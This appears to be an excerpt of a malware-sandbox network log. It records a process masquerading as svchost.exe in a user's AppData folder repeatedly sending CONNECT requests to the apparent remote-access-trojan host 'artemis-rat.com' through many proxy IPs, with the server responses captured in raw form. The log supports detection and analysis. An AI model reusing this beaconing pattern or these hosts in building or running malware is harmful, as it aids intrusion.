                                                                                    2108192.168.2.55689041.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.808984995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2109192.168.2.55689141.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.809941053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2110192.168.2.556706104.16.105.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.811458111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.966265917 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2111192.168.2.55647762.85.224.217567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.815301895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2112192.168.2.556714104.18.254.768043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.818840027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.973155022 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2113192.168.2.55668634.49.208.2218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.818840027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2114192.168.2.55654718.135.133.116312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.819068909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.111432076 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2115192.168.2.55658598.162.25.73165343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.820594072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2116192.168.2.556587132.226.7.233027743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.827133894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2117192.168.2.55655634.81.72.318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.834563017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.564022064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.481901884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.380593061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2118192.168.2.556508159.223.71.715915943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.834743977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2119192.168.2.556722159.89.138.1308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.844425917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.015568972 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.10.3 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2120192.168.2.556553194.182.187.78312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.844611883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.536746025 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2121192.168.2.556752104.21.85.1098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.846049070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.000257015 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2122192.168.2.556385122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.847071886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2123192.168.2.55673447.88.3.19808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.850858927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.021451950 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.4
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2124192.168.2.556764104.23.141.1968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.856515884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.010979891 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2125192.168.2.555550114.108.177.1046098443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.857777119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2126192.168.2.556776104.19.138.48043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.861915112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.016412973 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2127192.168.2.556561119.196.168.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.862865925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2128192.168.2.556621147.75.92.2511000643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.865058899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.149209023 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2129192.168.2.556785104.16.107.2068043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.866096973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.020515919 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2130192.168.2.55649535.154.71.72108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.866720915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.249789000 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2131192.168.2.55669523.152.40.15505043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.868103981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2132192.168.2.556780162.159.242.2308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.870667934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.033910036 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2133192.168.2.55662813.40.239.130312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.874027967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.172269106 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
